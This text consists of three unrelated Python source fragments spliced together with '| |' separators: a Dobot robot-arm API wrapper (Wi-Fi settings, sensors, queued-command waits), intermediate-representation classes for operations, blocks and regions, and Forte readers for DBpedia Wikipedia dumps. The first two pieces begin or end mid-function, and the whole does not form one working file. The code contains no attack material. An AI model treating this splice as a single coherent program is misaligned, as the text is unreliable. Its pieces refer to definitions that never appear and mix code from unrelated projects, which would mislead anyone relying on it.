if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
def GetAngleSensorCoef(api):
rearArmAngleCoef = c_float(0)
frontArmAngleCoef = c_float(0)
while(True):
result = api.GetAngleSensorCoef(c_int(masterId), c_int(slaveId), byref(rearArmAngleCoef), byref(frontArmAngleCoef))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
return [rearArmAngleCoef.value, frontArmAngleCoef.value]
def SetBaseDecoderStaticError(api, baseDecoderError):
c_baseDecoderError = c_float(baseDecoderError)
while(True):
result = api.SetBaseDecoderStaticError(c_int(masterId), c_int(slaveId), c_baseDecoderError)
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
def GetBaseDecoderStaticError(api):
baseDecoderError = c_float(0)
while(True):
result = api.GetBaseDecoderStaticError(c_int(masterId), c_int(slaveId), byref(baseDecoderError))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
return [baseDecoderError.value]
def GetWIFIConnectStatus(api):
isConnected = c_bool(0)
while(True):
if not QuitDobotApiFlag:
break
result = api.GetWIFIConnectStatus(c_int(masterId), c_int(slaveId), byref(isConnected))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
return [isConnected.value]
def SetWIFIConfigMode(api, enable):
while(True):
if not QuitDobotApiFlag:
break
result = api.SetWIFIConfigMode(c_int(masterId), c_int(slaveId), enable)
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
def GetWIFIConfigMode(api):
isEnabled = c_bool(0)
while(True):
if not QuitDobotApiFlag:
break
result = api.GetWIFIConfigMode(c_int(masterId), c_int(slaveId), byref(isEnabled))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
return [isEnabled.value]
def SetWIFISSID(api, ssid):
szPara = create_string_buffer(len(ssid))
szPara.raw = ssid.encode("utf-8")
while(True):
if not QuitDobotApiFlag:
break
result = api.SetWIFISSID(c_int(masterId), c_int(slaveId), szPara)
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
def GetWIFISSID(api):
szPara = create_string_buffer(100)
while(True):
if not QuitDobotApiFlag:
break
result = api.GetWIFISSID(c_int(masterId), c_int(slaveId), szPara, 25)
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
ssid = szPara.value.decode("utf-8")
return [ssid]
def SetWIFIPassword(api, password):
szPara = create_string_buffer(25)
szPara.raw = password.encode("utf-8")
while(True):
if not QuitDobotApiFlag:
break
result = api.SetWIFIPassword(c_int(masterId), c_int(slaveId), szPara)
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
def GetWIFIPassword(api):
szPara = create_string_buffer(25)
while(True):
if not QuitDobotApiFlag:
break
result = api.GetWIFIPassword(c_int(masterId), c_int(slaveId), szPara, 25)
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
password = szPara.value.decode("utf-8")
return [password]
def SetWIFIIPAddress(api, dhcp, addr1, addr2, addr3, addr4):
wifiIPAddress = WIFIIPAddress()
wifiIPAddress.dhcp = dhcp
wifiIPAddress.addr1 = addr1
wifiIPAddress.addr2 = addr2
wifiIPAddress.addr3 = addr3
wifiIPAddress.addr4 = addr4
while(True):
if not QuitDobotApiFlag:
break
result = api.SetWIFIIPAddress(c_int(masterId), c_int(slaveId), byref(wifiIPAddress))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
def GetWIFIIPAddress(api):
wifiIPAddress = WIFIIPAddress()
while(True):
if not QuitDobotApiFlag:
break
result = api.GetWIFIIPAddress(c_int(masterId), c_int(slaveId), byref(wifiIPAddress))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
return [c_uint8(wifiIPAddress.dhcp).value, c_uint8(wifiIPAddress.addr1).value, c_uint8(wifiIPAddress.addr2).value, c_uint8(wifiIPAddress.addr3).value, c_uint8(wifiIPAddress.addr4).value]
def SetWIFINetmask(api, addr1, addr2, addr3, addr4):
wifiNetmask = WIFINetmask()
wifiNetmask.addr1 = addr1
wifiNetmask.addr2 = addr2
wifiNetmask.addr3 = addr3
wifiNetmask.addr4 = addr4
while(True):
if not QuitDobotApiFlag:
break
result = api.SetWIFINetmask(c_int(masterId), c_int(slaveId), byref(wifiNetmask))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
def GetWIFINetmask(api):
wifiNetmask = WIFINetmask()
while(True):
if not QuitDobotApiFlag:
break
result = api.GetWIFINetmask(c_int(masterId), c_int(slaveId), byref(wifiNetmask))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
return [c_uint8(wifiNetmask.addr1).value, c_uint8(wifiNetmask.addr2).value, c_uint8(wifiNetmask.addr3).value, c_uint8(wifiNetmask.addr4).value]
def SetWIFIGateway(api, addr1, addr2, addr3, addr4):
wifiGateway = WIFIGateway()
wifiGateway.addr1 = addr1
wifiGateway.addr2 = addr2
wifiGateway.addr3 = addr3
wifiGateway.addr4 = addr4
while(True):
if not QuitDobotApiFlag:
break
result = api.SetWIFIGateway(c_int(masterId), c_int(slaveId), byref(wifiGateway))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
def GetWIFIGateway(api):
wifiGateway = WIFIGateway()
while(True):
if not QuitDobotApiFlag:
break
result = api.GetWIFIGateway(c_int(masterId), c_int(slaveId), byref(wifiGateway))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
return [c_uint8(wifiGateway.addr1).value, c_uint8(wifiGateway.addr2).value, c_uint8(wifiGateway.addr3).value, c_uint8(wifiGateway.addr4).value]
def SetWIFIDNS(api, addr1, addr2, addr3, addr4):
wifiDNS = WIFIDNS()
wifiDNS.addr1 = addr1
wifiDNS.addr2 = addr2
wifiDNS.addr3 = addr3
wifiDNS.addr4 = addr4
while(True):
if not QuitDobotApiFlag:
break
result = api.SetWIFIDNS(c_int(masterId), c_int(slaveId), byref(wifiDNS))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
def GetWIFIDNS(api):
wifiDNS = WIFIDNS()
while(True):
if not QuitDobotApiFlag:
break
result = api.GetWIFIDNS(c_int(masterId), c_int(slaveId), byref(wifiDNS))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
return [c_uint8(wifiDNS.addr1).value, c_uint8(wifiDNS.addr2).value, c_uint8(wifiDNS.addr3).value, c_uint8(wifiDNS.addr4).value]
def SetColorSensor(api, isEnable, colorPort, version=0):
enable = c_bool(isEnable)
port = c_uint8(colorPort)
version = c_uint8(version)
queuedCmdIndex = c_uint64(0)
if slaveDevType == DevType.Magician:
tempSlaveId = slaveId
elif masterDevType == DevType.Conntroller and (slaveDevType == DevType.MagicianLite or slaveDevType == DevType.Idle):
tempSlaveId = -1
else:
tempSlaveId = slaveId
while(True):
result = api.SetColorSensor(c_int(masterId), c_int(tempSlaveId), enable, port, version, 1, byref(queuedCmdIndex))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
def GetColorSensor(api):
r = c_ubyte(0)
g = c_ubyte(0)
b = c_ubyte(0)
if slaveDevType == DevType.Magician:
tempSlaveId = slaveId
elif masterDevType == DevType.Conntroller and (slaveDevType == DevType.MagicianLite or slaveDevType == DevType.Idle):
tempSlaveId = -1
else:
tempSlaveId = slaveId
while(True):
result = api.GetColorSensor(c_int(masterId), c_int(tempSlaveId), byref(r), byref(g), byref(b))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
return [r.value, g.value, b.value]
def SetInfraredSensor(api, isEnable, infraredPort, version=0):
enable = c_bool(isEnable)
port = c_uint8(infraredPort)
queuedCmdIndex = c_uint64(0)
version = c_uint8(version)
if slaveDevType == DevType.Magician:
tempSlaveId = slaveId
elif masterDevType == DevType.Conntroller and (slaveDevType == DevType.MagicianLite or slaveDevType == DevType.Idle):
tempSlaveId = -1
else:
tempSlaveId = slaveId
while(True):
result = api.SetInfraredSensor(c_int(masterId), c_int(tempSlaveId), enable, port, version, 1, byref(queuedCmdIndex))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
def GetInfraredSensor(api, infraredPort):
port = c_uint8(infraredPort)
value = c_ubyte(0)
if slaveDevType == DevType.Magician:
tempSlaveId = slaveId
elif masterDevType == DevType.Conntroller and (slaveDevType == DevType.MagicianLite or slaveDevType == DevType.Idle):
tempSlaveId = -1
else:
tempSlaveId = slaveId
while(True):
result = api.GetInfraredSensor(c_int(masterId), c_int(tempSlaveId), port, byref(value))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
return [value.value]
def SetLostStepParams(api, threshold, isQueued=0):
queuedCmdIndex = c_uint64(0)
t = c_float(threshold)
while(True):
result = api.SetLostStepParams(c_int(masterId), c_int(slaveId), t, isQueued, byref(queuedCmdIndex))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
return [queuedCmdIndex.value]
def SetLostStepCmd(api, isQueued=0):
queuedCmdIndex = c_uint64(0)
while(True):
result = api.SetLostStepCmd(c_int(masterId), c_int(slaveId), isQueued, byref(queuedCmdIndex))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
return [queuedCmdIndex.value]
def GetUART4PeripheralsType(api):
type = c_uint8(0)
if (masterDevType == DevType.Conntroller and slaveDevType == DevType.MagicianLite) or (masterDevType == DevType.Conntroller and slaveDevType == DevType.Idle):
while(True):
result = api.GetUART4PeripheralsType(c_int(masterId), c_int(-1), byref(type))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
elif masterDevType == DevType.Magician:
while(True):
result = api.GetUART4PeripheralsType(c_int(masterId), c_int(slaveId), byref(type))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
return [type.value]
def GetDeviceVersionEx(api): #2019.6.25 song 控制盒+Magician Lite时,获取控制盒的版本
# majorVersion = c_byte(0)
# minorVersion = c_byte(0)
# revision = c_byte(0)
# hwVersion = c_byte(0)
deviceVersion1 = DeviceVersion()
deviceVersion2 = DeviceVersion()
if masterDevType == DevType.Conntroller and slaveDevType == DevType.MagicianLite:
# 2019.09.03 by song 控制盒+magicianLite 返回两个设备的版本信息
while(True):
result = api.GetDeviceVersion(c_int(masterId), c_int(-1), byref(deviceVersion1))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
list_MagicBoxVersion = [deviceVersion1.fw_majorVersion, deviceVersion1.fw_minorVersion, deviceVersion1.fw_revision, deviceVersion1.fw_alphaVersion,
deviceVersion1.hw_majorVersion, deviceVersion1.hw_minorVersion, deviceVersion1.hw_revision, deviceVersion1.hw_alphaVersion]
while(True):
result = api.GetDeviceVersion(c_int(masterId), c_int(slaveId), byref(deviceVersion2))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
list_MagicianLiteVersion = [deviceVersion2.fw_majorVersion, deviceVersion2.fw_minorVersion, deviceVersion2.fw_revision, deviceVersion2.fw_alphaVersion,
deviceVersion2.hw_majorVersion, deviceVersion2.hw_minorVersion, deviceVersion2.hw_revision, deviceVersion2.hw_alphaVersion]
return [list_MagicBoxVersion, list_MagicianLiteVersion]
################## Ex扩展函数,该套函数会检测每一条指令运行完毕 ##################
def GetPoseEx(api, index):
if index == 0:
ret = GetDeviceWithL(api)
if not ret:
print("Dobot is not in L model")
return
lr = GetPoseL(api)
return round(lr[0], 4)
pos = GetPose(api)
return round(pos[index-1], 4)
def SetHOMECmdEx(api, temp, isQueued=0):
ret = SetHOMECmd(api, temp, isQueued)
queuedCmdIndex = c_uint64(0)
queuedCmdIndex1 = c_uint64(0)
if masterDevType == DevType.Conntroller and slaveDevType == DevType.MagicianLite:
if isUsingLinearRail:
while(True):
result = api.GetQueuedCmdCurrentIndex(c_int(masterId), c_int(-1), byref(queuedCmdIndex1))
if result == DobotCommunicate.DobotCommunicate_NoError and ret[1] <= queuedCmdIndex1.value:
break
dSleep(100)
while(True):
result = api.GetQueuedCmdCurrentIndex(c_int(masterId), c_int(slaveId), byref(queuedCmdIndex))
if result == DobotCommunicate.DobotCommunicate_NoError and ret[0] <= queuedCmdIndex.value:
break
dSleep(100)
else:
while(True):
result = api.GetQueuedCmdCurrentIndex(c_int(masterId), c_int(slaveId), byref(queuedCmdIndex))
if result == DobotCommunicate.DobotCommunicate_NoError and ret[0] <= queuedCmdIndex.value:
break
dSleep(100)
elif masterDevType == DevType.Conntroller and slaveDevType == DevType.Idle:
while(True):
result = api.GetQueuedCmdCurrentIndex(c_int(masterId), c_int(-1), byref(queuedCmdIndex1))
if result == DobotCommunicate.DobotCommunicate_NoError and ret[1] <= queuedCmdIndex1.value:
break
dSleep(100)
else:
while(True):
result = api.GetQueuedCmdCurrentIndex(c_int(masterId), c_int(slaveId), byref(queuedCmdIndex))
if result == DobotCommunicate.DobotCommunicate_NoError and ret[0] <= queuedCmdIndex.value:
break
dSleep(100)
def SetWAITCmdEx(api, waitTime, isQueued=0):
ret = SetWAITCmd(api, waitTime, isQueued)
while(True):
if not QuitDobotApiFlag:
break
if ret[0] <= GetQueuedCmdCurrentIndex(api)[0]:
| |
instead."""
if value_mapper is None:
value_mapper = {}
if block_mapper is None:
block_mapper = {}
operands = [
(value_mapper[operand] if operand in value_mapper else operand)
for operand in self.operands
]
result_types = [res.typ for res in self.results]
attributes = self.attributes.copy()
successors = [(block_mapper[successor]
if successor in block_mapper else successor)
for successor in self.successors]
regions = [Region() for _ in self.regions]
cloned_op = self.create(operands=operands,
result_types=result_types,
attributes=attributes,
successors=successors,
regions=regions)
for idx, result in enumerate(cloned_op.results):
value_mapper[self.results[idx]] = result
return cloned_op
def clone(self: OpT,
value_mapper: Optional[Dict[SSAValue, SSAValue]] = None,
block_mapper: Optional[Dict[Block, Block]] = None) -> OpT:
"""Clone an operation with all its regions and operations in them."""
if value_mapper is None:
value_mapper = {}
if block_mapper is None:
block_mapper = {}
op = self.clone_without_regions(value_mapper, block_mapper)
for idx, region in enumerate(self.regions):
region.clone_into(op.regions[idx], 0, value_mapper, block_mapper)
return op
def erase(self,
safe_erase: bool = True,
drop_references: bool = True) -> None:
"""
Erase the operation, and remove all its references to other operations.
If safe_erase is specified, check that the operation results are not used.
"""
assert self.parent is None, "Operation with parents should first be detached before erasure."
if drop_references:
self.drop_all_references()
for result in self.results:
result.erase(safe_erase=safe_erase)
def detach(self):
"""Detach the operation from its parent block."""
if self.parent is None:
raise Exception("Cannot detach a toplevel operation.")
self.parent.detach_op(self)
def get_toplevel_object(self) -> Union[Operation, Block, Region]:
"""Get the operation, block, or region ancestor that has no parents."""
if self.parent is None:
return self
return self.parent.get_toplevel_object()
def is_ancestor(self, op: Union[Operation, Block, Region]) -> bool:
"""Returns true if the operation is an ancestor of the operation, block, or region."""
if op is self:
return True
if op.parent is None:
return False
return self.is_ancestor(op.parent)
def __eq__(self, other: Operation) -> bool:
return self is other
def __hash__(self) -> int:
return id(self)
@dataclass(eq=False)
class Block:
"""A sequence of operations"""
_args: FrozenList[BlockArgument] = field(default_factory=FrozenList,
init=False)
"""The basic block arguments."""
ops: List[Operation] = field(default_factory=list, init=False)
"""Ordered operations contained in the block."""
parent: Optional[Region] = field(default=None, init=False, repr=False)
"""Parent region containing the block."""
def parent_op(self) -> Optional[Operation]:
return self.parent.parent if self.parent else None
def parent_region(self) -> Optional[Region]:
return self.parent
def parent_block(self) -> Optional[Block]:
return self.parent.parent.parent if self.parent and self.parent.parent else None
def __repr__(self) -> str:
return f"Block(_args={repr(self._args)}, num_ops={len(self.ops)})"
@property
def args(self) -> FrozenList[BlockArgument]:
"""Returns the block arguments."""
return self._args
@staticmethod
def from_arg_types(arg_types: List[Attribute]) -> Block:
b = Block()
b._args = FrozenList([
BlockArgument(typ, b, index) for index, typ in enumerate(arg_types)
])
b._args.freeze()
return b
@staticmethod
def from_ops(ops: List[Operation],
arg_types: Optional[List[Attribute]] = None):
b = Block()
if arg_types is not None:
b._args = FrozenList([
BlockArgument(typ, b, index)
for index, typ in enumerate(arg_types)
])
b._args.freeze()
b.add_ops(ops)
return b
class BlockCallback(Protocol):
def __call__(self, *args: BlockArgument) -> List[Operation]:
...
@staticmethod
def from_callable(block_arg_types: List[Attribute], f: BlockCallback):
b = Block.from_arg_types(block_arg_types)
b.add_ops(f(*b.args))
return b
def is_ancestor(self, op: Union[Operation, Block, Region]) -> bool:
"""Returns true if the block is an ancestor of the operation, block, or region."""
if op is self:
return True
if op.parent is None:
return False
return self.is_ancestor(op.parent)
def insert_arg(self, typ: Attribute, index: int) -> BlockArgument:
"""
Insert a new argument with a given type to the arguments list at a specific index.
Returns the new argument.
"""
if index < 0 or index > len(self._args):
raise Exception("Unexpected index")
new_arg = BlockArgument(typ, self, index)
for arg in self._args[index:]:
arg.index += 1
self._args = FrozenList(
list(self._args[:index]) + [new_arg] + list(self._args[index:]))
self._args.freeze()
return new_arg
def erase_arg(self, arg: BlockArgument, safe_erase: bool = True) -> None:
"""
Erase a block argument.
If safe_erase is True, check that the block argument is not used.
If safe_erase is False, replace the block argument uses with an ErasedSSAVAlue.
"""
if arg.block is not self:
raise Exception(
"Attempting to delete an argument of the wrong block")
for block_arg in self._args[arg.index + 1:]:
block_arg.index -= 1
self._args = FrozenList(
list(self._args[:arg.index]) + list(self._args[arg.index + 1:]))
arg.erase(safe_erase=safe_erase)
def _attach_op(self, operation: Operation) -> None:
"""Attach an operation to the block, and check that it has no parents."""
if operation.parent is not None:
raise ValueError(
"Can't add to a block an operation already attached to a block."
)
if operation.is_ancestor(self):
raise ValueError(
"Can't add an operation to a block contained in the operation."
)
operation.parent = self
def add_op(self, operation: Operation) -> None:
"""
Add an operation at the end of the block.
The operation should not be attached to another block already.
"""
self._attach_op(operation)
self.ops.append(operation)
def add_ops(self, ops: List[Operation]) -> None:
"""
Add operations at the end of the block.
The operations should not be attached to another block.
"""
for op in ops:
self.add_op(op)
def insert_op(self,
ops: Union[Operation, List[Operation]],
index: int,
name: Optional[str] = None) -> None:
"""
Insert one or multiple operations at a given index in the block.
The operations should not be attached to another block.
"""
if index < 0 or index > len(self.ops):
raise ValueError(
f"Can't insert operation in index {index} in a block with {len(self.ops)} operations."
)
if not isinstance(ops, list):
ops = [ops]
if name:
for curr_op in ops:
for res in curr_op.results:
res.name = name
for op in ops:
self._attach_op(op)
self.ops = self.ops[:index] + ops + self.ops[index:]
def get_operation_index(self, op: Operation) -> int:
"""Get the operation position in a block."""
if op.parent is not self:
raise Exception("Operation is not a children of the block.")
for idx, block_op in enumerate(self.ops):
if block_op is op:
return idx
assert False, "Unexpected xdsl error"
def detach_op(self, op: Union[int, Operation]) -> Operation:
"""
Detach an operation from the block.
Returns the detached operation.
"""
if isinstance(op, Operation):
op_idx = self.get_operation_index(op)
else:
op_idx = op
op = self.ops[op_idx]
if op.parent is not self:
raise Exception("Cannot detach operation from a different block.")
op.parent = None
self.ops = self.ops[:op_idx] + self.ops[op_idx + 1:]
return op
def erase_op(self,
op: Union[int, Operation],
safe_erase: bool = True) -> None:
"""
Erase an operation from the block.
If safe_erase is True, check that the operation has no uses.
"""
op = self.detach_op(op)
op.erase(safe_erase=safe_erase)
def walk(self, fun: Callable[[Operation], None]) -> None:
"""Call a function on all operations contained in the block."""
for op in self.ops:
op.walk(fun)
def verify(self) -> None:
for operation in self.ops:
if operation.parent != self:
raise Exception(
"Parent pointer of operation does not refer to containing region"
)
operation.verify()
def drop_all_references(self) -> None:
"""
Drop all references to other operations.
This function is called prior to deleting a block.
"""
self.parent = None
for op in self.ops:
op.drop_all_references()
def erase(self, safe_erase: bool = True) -> None:
"""
Erase the block, and remove all its references to other operations.
If safe_erase is specified, check that no operation results are used outside the block.
"""
assert self.parent is None, "Blocks with parents should first be detached before erasure."
self.drop_all_references()
for op in self.ops:
op.erase(safe_erase=safe_erase, drop_references=False)
def get_toplevel_object(self) -> Union[Operation, Block, Region]:
"""Get the operation, block, or region ancestor that has no parents."""
if self.parent is None:
return self
return self.parent.get_toplevel_object()
def __eq__(self, other: Block) -> bool:
return self is other
def __hash__(self) -> int:
return id(self)
@dataclass
class Region:
"""A region contains a CFG of blocks. Regions are contained in operations."""
blocks: List[Block] = field(default_factory=list, init=False)
"""Blocks contained in the region. The first block is the entry block."""
parent: Optional[Operation] = field(default=None, init=False, repr=False)
"""Operation containing the region."""
def parent_block(self) -> Optional[Block]:
return self.parent.parent if self.parent else None
def parent_op(self) -> Optional[Operation]:
return self.parent
def parent_region(self) -> Optional[Region]:
return self.parent.parent.parent if self.parent and self.parent.parent else None
def __repr__(self) -> str:
return f"Region(num_blocks={len(self.blocks)})"
@staticmethod
def from_operation_list(ops: List[Operation]) -> Region:
block = Block.from_ops(ops)
region = Region()
region.add_block(block)
return region
@staticmethod
def from_block_list(blocks: List[Block]) -> Region:
region = Region()
for block in blocks:
region.add_block(block)
return region
@staticmethod
def get(arg: Region | List[Block] | List[Operation]) -> Region:
if isinstance(arg, Region):
return arg
if isinstance(arg, list):
if len(arg) == 0:
return Region.from_operation_list([])
if isinstance(arg[0], Block):
return Region.from_block_list(cast(List[Block], arg))
if isinstance(arg[0], Operation):
return Region.from_operation_list(cast(List[Operation], arg))
raise TypeError(f"Can't build a | |
<reponame>J007X/forte<filename>forte/datasets/wikipedia/dbpedia/dbpedia_datasets.py
# Copyright 2019 The Forte Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
In this module, we provide a few readers to help reading DBpedia processed
Wikipedia dumps. To use the readers here, the DBpedia full text datasets
are needed: https://wiki.dbpedia.org/downloads-2016-10#p10608-2
"""
import csv
import logging
import os
from collections import defaultdict
from typing import (
Iterator,
Dict,
List,
Tuple,
TextIO,
Any,
DefaultDict,
Optional,
)
import rdflib
from smart_open import open
from forte.common import Resources
from forte.common.configuration import Config
from forte.common.exception import ResourceError
from forte.data.base_reader import PackReader
from forte.data.data_pack import DataPack
from forte.datasets.wikipedia.dbpedia.db_utils import (
NIFParser,
get_resource_attribute,
get_resource_name,
get_resource_fragment,
print_progress,
ContextGroupedNIFReader,
state_type,
)
from forte.processors.base import PackWriter
from ft.onto.wikipedia import (
WikiPage,
WikiSection,
WikiParagraph,
WikiTitle,
WikiAnchor,
WikiInfoBoxProperty,
WikiInfoBoxMapped,
WikiCategory,
)
__all__ = [
"DBpediaWikiReader",
"WikiPackReader",
"WikiArticleWriter",
"WikiAnchorReader",
"WikiStructReader",
"WikiPropertyReader",
"WikiInfoBoxReader",
]
class DBpediaWikiReader(PackReader):
"""
This reader reads in the Wikipedia full text articles from a DBpedia
full text dump, which is the `NIF Context` dataset from here:
https://wiki.dbpedia.org/downloads-2016-10#p10608-2 .
"""
def __init__(
self,
):
super().__init__()
self.__redirects: Dict[str, str] = {}
def initialize(self, resources: Resources, configs: Config):
super().initialize(resources, configs)
if self.resources.contains("redirects"):
self.__redirects = self.resources.get("redirects")
logging.info("%d redirects loaded.", len(self.__redirects))
else:
raise ResourceError("Redirects not provided from resources.")
def _collect( # type: ignore
self, nif_context: str
) -> Iterator[Dict[str, str]]:
str_data: Dict[str, str] = {}
for context_statements in NIFParser(nif_context):
for s, v, o, c in context_statements:
nif_type = get_resource_attribute(s, "nif")
print_progress(f"Collecting DBpedia resource: [{c.identifier}]")
fragment = get_resource_fragment(v)
if (
nif_type
and nif_type == "context"
and fragment is not None
and fragment == "isString"
):
str_data["text"] = o.toPython()
doc_name: Optional[str] = get_resource_name(s)
old_id: Optional[str] = get_resource_attribute(
c.identifier, "oldid"
)
if doc_name is not None and old_id is not None:
str_data["doc_name"] = doc_name
str_data["oldid"] = old_id
yield str_data
def _parse_pack(self, doc_data: Dict[str, str]) -> Iterator[DataPack]:
pack = DataPack()
doc_name: str = doc_data["doc_name"]
if doc_name in self.__redirects:
doc_name = self.__redirects[doc_name]
full_text: str = doc_data["text"]
pack.set_text(full_text)
page = WikiPage(pack, 0, len(full_text))
page.page_id = doc_data["oldid"]
page.page_name = doc_name
pack.pack_name = doc_name
yield pack
def read_index(pack_index_path: str) -> Dict[str, str]:
"""
Reads an index from the page name to the path of the stored pack.
Args:
pack_index_path: The path of this index file. The file should be a tab
separated file.
Returns:
A dictionary that maps from the page name to the full path.
"""
page_idx: Dict[str, str] = {}
logging.info("Reading pack index from %s", pack_index_path)
with open(pack_index_path) as idx:
for page_name, page_path in csv.reader(idx, delimiter="\t"):
page_idx[page_name] = page_path
return page_idx
class WikiPackReader(PackReader):
"""
This reader reads information from an NIF graph, and find out the
corresponding data pack stored on disk. The output from this reader
are these data packs plus the additional NIF information.
The function `add_wiki_info` is to be implemented to handle how the
NIF statements are added to the data pack.
"""
def __init__(self):
super().__init__()
self._pack_index: Dict[str, str] = {}
self._pack_dir: str = ""
self._redirects: Dict[str, str] = {}
self._resume_index: Dict[str, str] = {}
def initialize(self, resources: Resources, configs: Config):
super().initialize(resources, configs)
# A mapping from the name of the page to the path on th disk.
self._pack_index = read_index(configs.pack_index)
self._pack_dir = configs.pack_dir
if self.configs.resume_index:
self._resume_index = read_index(configs.resume_index)
print_progress(
f"Loaded {len(self._resume_index)} existing " f"files.", "\n"
)
if self.resources.contains("redirects"):
self._redirects = self.resources.get("redirects")
print_progress(f"{len(self._redirects)} redirects loaded.", "\n")
else:
raise ResourceError("Redirects not provided from resources.")
def add_wiki_info(self, pack: DataPack, statements: List[state_type]):
raise NotImplementedError
def _collect( # type: ignore
self, nif_path: str
) -> Iterator[Tuple[str, Dict[str, List[state_type]]]]:
skipped = 0
for _, statements in ContextGroupedNIFReader(nif_path):
name = get_resource_name(statements[0][0])
if name is not None:
if name not in self._resume_index:
yield name, statements
else:
skipped += 1
print_progress(
f"Skipped {skipped} documents", terminal_only=True
)
def _parse_pack(
self, collection: Tuple[str, List[state_type]]
) -> Iterator[DataPack]:
resource_name, statements = collection
if resource_name in self._redirects:
resource_name = self._redirects[resource_name]
if resource_name in self._pack_index:
print_progress(
f"Handling resource [{resource_name}] in {self.component_name}"
)
pack_path = os.path.join(
self._pack_dir, self._pack_index[resource_name]
)
if os.path.exists(pack_path):
pack: DataPack = DataPack.deserialize(
pack_path,
self.configs.serialize_method,
self.configs.zip_pack,
)
self.add_wiki_info(pack, statements)
yield pack
else:
logging.info("Resource %s pack not found.", resource_name)
@classmethod
def default_configs(cls):
"""
This defines a basic config structure for the reader.
Here:
- pack_dir: the directory that contains all the serialized packs.
- pack_index: the file name under the pack directory that points to
the index from the name to the actual pack path.
"""
return {
"pack_index": "article.idx",
"pack_dir": ".",
"resume_index": None,
}
class WikiArticleWriter(PackWriter):
"""
This is a pack writer that writes out the Wikipedia articles to disk. It
has two special behaviors:
1. If the `input_index_file` file is provided via the configuration and it
exists, the file will be used to determine the path of writing the
data packs. This will also activate the overwrite mode.
2. If the `input_index_file` file is not provided,
2a. The packs are organized into directories. Each directory contains
at most 2000 documents.
2b. the overwrite mode will not be activated
3. If the `output_index_file` is provided, an index file with the provided
name/path will be created, its content will be a mapping from the article
name to the article path.
There are two general use cases:
1. If the writer is used to write a new directory of data, simply provide
the `output_index_file`
2. If the writer is used to add content/overwriting to an existing
directory, it is suggested to use the index file of the original
directory as the `input_index_file`, and the `output_index_file` can be
used to store the information for this new writing process if desired.
"""
_input_index_file: TextIO
_output_index_file: TextIO
# It is difficult to get the type of the csv writer
# https://stackoverflow.com/questions
# /51264355/how-to-type-annotate-object-returned-by-csv-writer
_csv_writer: Any
def __init__(self):
super().__init__()
self.article_count: int = 0
self.__use_existing_index: bool = False
self._article_index = {}
def initialize(self, resources: Resources, configs: Config):
super().initialize(resources, configs)
self.article_count = 0
if self.configs.use_input_index and self.configs.input_index_file:
# Load input index.
input_index_path = self.configs.input_index_file
self._article_index = {}
if os.path.exists(input_index_path):
self._input_index_file = open(input_index_path)
with open(input_index_path) as f:
for line in f:
article_name, sub_path = line.strip().split()
self._article_index[article_name] = sub_path
self.__use_existing_index = True
self.configs.overwrite = True
logging.info(
"Wikipedia writer is setup with existing index "
"file. The output will be written following the input "
"index path and overwritten is enabled."
)
else:
raise FileNotFoundError(
f"Cannot find provided index file {input_index_path}"
)
else:
self.__use_existing_index = False
output_index_path = os.path.join(
self.configs.output_dir, self.configs.output_index_file
)
self._output_index_file = (
open(output_index_path, "a")
if self.configs.append_to_index
else open(output_index_path, "w")
)
self._csv_writer = csv.writer(self._output_index_file, delimiter="\t")
def sub_output_path(self, pack: DataPack) -> Optional[str]:
if self.__use_existing_index:
if pack.pack_name in self._article_index:
# Since datasets are built separated, there might be cases
# where the article referred later is not in the original
# parsed dataset, so we need to check if they exist.
# We could replace the suffix based on writing config.
return (
self._article_index[pack.pack_name].split(".")[0]
+ self._suffix
)
else:
return None
else:
# Organize the data by IO ordering instead.
sub_dir = str(int(self.article_count / 2000)).zfill(5)
pid = pack.get_single(WikiPage).page_id # type: ignore
doc_name = f"doc_{self.article_count}" if pid is None else pid
return os.path.join(sub_dir, doc_name) + self._suffix
def _process(self, input_pack: DataPack):
"""
In additional writing the data pack, we also write the index under
the condition, to store the document id to the relative storage of this
DataPack. This can be used as a simple index to retrieve the relevant
file, which can enable faster lookup.
Args:
input_pack: The DataPack that contains the Wikipedia information.
Returns:
"""
super()._process(input_pack)
# Write the output index files.
